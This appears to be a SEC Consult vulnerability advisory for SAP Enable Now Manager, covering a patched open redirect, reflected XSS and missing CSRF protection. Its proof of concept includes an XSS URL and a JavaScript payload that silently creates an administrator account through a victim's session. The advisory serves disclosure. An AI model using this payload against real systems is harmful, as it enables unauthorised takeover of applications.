Vendor description
"SAP Enable Now solution provides advanced in-application help and training capabilities helping you to improve productivity and user adoption, as well as to increase satisfaction of the end-user experience. Create, maintain, and deliver in-application help, learning materials, and documentation content easily."
Source: https://www.sapstore.com/solutions/41243/SAP-Enable-Now
Business recommendation
Due to the Cloud Edition being affected, the vendor automatically pushed a fix in the production environment in the May 2023 Release.
SEC Consult recommends to perform a thorough security review conducted by security professionals to identify and resolve potential further critical security issues.
Vulnerability overview/description
Multiple vulnerabilities were identified that could be chained together in order to allow a remote, unauthenticated attacker to create new administrative user accounts by tricking the victim to click on a malicious link or visit a malicious website prepared by the attacker.
1) Open Redirect/URL Redirection Vulnerability
The file download feature of the application contains an unvalidated parameter value that exposes it to an open redirect vulnerability. An attacker can create a malicious URL which would redirect the victim to a malicious site, for example, a phishing site convincing the victim to login once again.
2) Reflected Cross Site Scripting (XSS)
A reflected XSS vulnerability was found affecting the same parameter as used in 1). Due to insufficient input validation and output encoding, an attacker can inject arbitrary HTML or JavaScript code into the generated server response, executing it in the browser of the victim. The vulnerability, can be exploited, for example, to create new administrative user accounts in the application, thereby fully compromising the application. Any CSRF protection can be bypassed by means of this vulnerability.
3) Insufficient Cross-Site Request Forgery (CSRF) Protection
No implementation of CSRF protection was detected in the application. Using this vulnerability, an attacker can issue requests in the context of administrative user sessions. This includes critical state changing actions such as user creation or role assignment. Note that in the test environment the option 'Supported Functions' was set to value 'DISABLE-CSRF-PROTECTION' in the server settings feature of the application.
Certain configurations require this setting to be enabled, e.g. to allow the SEN Workflow Approver extension to submit the data on behalf of the logged-in user to the SAP Enable Now Manager. Without this parameter, the extension will only be able to read the content and workflow information).
This indicates that there is an insecure feature which allows the protection mechanism to be disabled globally. It could not be clarified if this is the default setting. In any case, the function should still be enhanced to protect critical actions such as functions used in user management or role/permission management even if the mechanism is disabled by configuration.
Proof of concept
1) Open Redirect/URL Redirection Vulnerability
The public endpoint /resources/open_file.html is vulnerable to an open redirect via GET parameter 'info'. To verify this vulnerability, it is sufficient to open the following URL in a web browser.
https:// example.enable-now.cloud.sap/resources/open_file.html?info=https:// www.sec-consult.comAfter browsing to the above link, the victim gets redirected to www.sec-consult.com in a new browser window opened by the embedded call of function window.open(). Note that both attacker and victim do not have to be authenticated for successful exploitation.
2) Reflected Cross-Site Scripting (XSS)
The public endpoint /resources/open_file.html is affected by an XSS vulnerability in GET parameter 'info'. To verify this vulnerability, it is sufficient to open the following URL in a web browser.
https:// example.enable-now.cloud.sap/resources/open_file.html?info=javascript:alert(document.domain)After browsing to the above link, the domain property returns the domain name of the server it was loaded from an alert window within the browser of the victim. This proves the successful execution of the injected JavaScript code. In fact, any kind of JavaScript code could be injected by the attacker. Note that both attacker and victim do not have to be authenticated for successful exploitation.
3) Insufficient Cross-Site Request Forgery (CSRF) Protection
No CSRF protection can be observed in POST requests sent between the client and server. This includes at least the functions "task creation", "user creation", "permission assignment" and "role/group assignment". Note that this vulnerability appears to only affect systems where the CSRF protection is disabled by option 'Supported Functions' set to value 'DISABLE-CSRF-PROTECTION' in the server settings. Although this setting can be reverted, it is advised to have the protection enabled for critical operations such as user creation or permission assignment at any time (also when the option is set).
Several of the vulnerabilities above can be chained together by an unauthenticated attacker. Considering the types of vulnerabilities, there are multiple exploitation scenarios. In our example we will create a link that, when clicked by an administrator victim, will create a new admin account. For this attack to work, we first need to gather some information. To create an account, we need to know two important values: the OU and the UID. The OU represents the Organizational Unit unique identifier. The UID here represents the unique Group ID of our target group where we want our new user to be added. Performing a simple GET request to endpoint /self/group, both values can be obtained. The following listing shows the server response.
HTTP/1.1 200
Cache-Control: no-cache, no-store, must-revalidate
Expires: 0
Vary: Origin
Set-Cookie: JSESSIONID=DD67AF<snip>ADF784; Path=/; Secure; HttpOnly;
Content-Type: text/json;charset=UTF-8
Server: SAP
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Length: 396
{"response":{"group":[{"name":"Learners","uid":"G_1C67681<snip>60E0938C4CB086",
"ou":"OU_E8BC20E2<snip>8034410C", "active":true},{"name":"Master Authors","uid":
"G_72568DE0<snip>85DE0845","ou":"OU_E8BC20E2<snip>8034410C ","active":true},{"name
":"Administrators","uid":"G_3B5DBB<snip>A97DE47C4EDF","ou":"OU_E8BC20E2<snip>80344 <-- UID of admin group and OU
10C ","active":true}]}}Finally, in order for the attack to succeed, the attacker needs the victim (logged in as administrator) to do first a request on the above endpoint, then a POST request on the endpoint /!/user to actually create the new user account with the administrator role assigned using the values taken from the previous response. These interactions can be scripted using the following ten lines of JavaScript code.
var req1 = new XMLHttpRequest();
req1.open('GET', "https:// example.enable-now.cloud.sap/self/group",false);
req1.withCredentials = true;
req1.send();
var obj = JSON.parse(req1.responseText).response;
for (var i = 0; i< obj.group.length ;i++) {if (obj.group[i].name === 'Administrators') {var uid = obj.group[i].uid;var ou = obj.group[i].ou}};
var req2 = new XMLHttpRequest();
req2.open('POST',"https:// example.enable-now.cloud.sap/!/user",false);
req2.withCredentials = true;
req2.send(JSON.stringify({"user":{"auth_user":"sapmatt","firstname":"SEC","lastname":"Consult","email":"","passwd":"sappass","role":[uid],"ou":ou}}));We can base64-encode this payload and pass it to the Javascript eval(atob()) function using the XSS vulnerability in the file download feature (seen in 2.). The link could then be shortened to enhance the likelihood of successful exploitation. This can be achieved, for example, by leveraging the Open Redirect vulnerability (seen in 1.) to redirect the victim to an attacker-controlled website and trigger the above payload, making it an attack more likely to succeed. If the victim is logged into the application and is part of the Administrator group, when they click on this link, a new admin account will be instantly created. The attacker then can log in and has full control over the application.
Vulnerable / tested versions
The following versions of the software were found to be vulnerable during our tests:
- SAP Enable Now Manager Version: 10.6.5 (Build 2804) - Cloud Edition (~October 2022)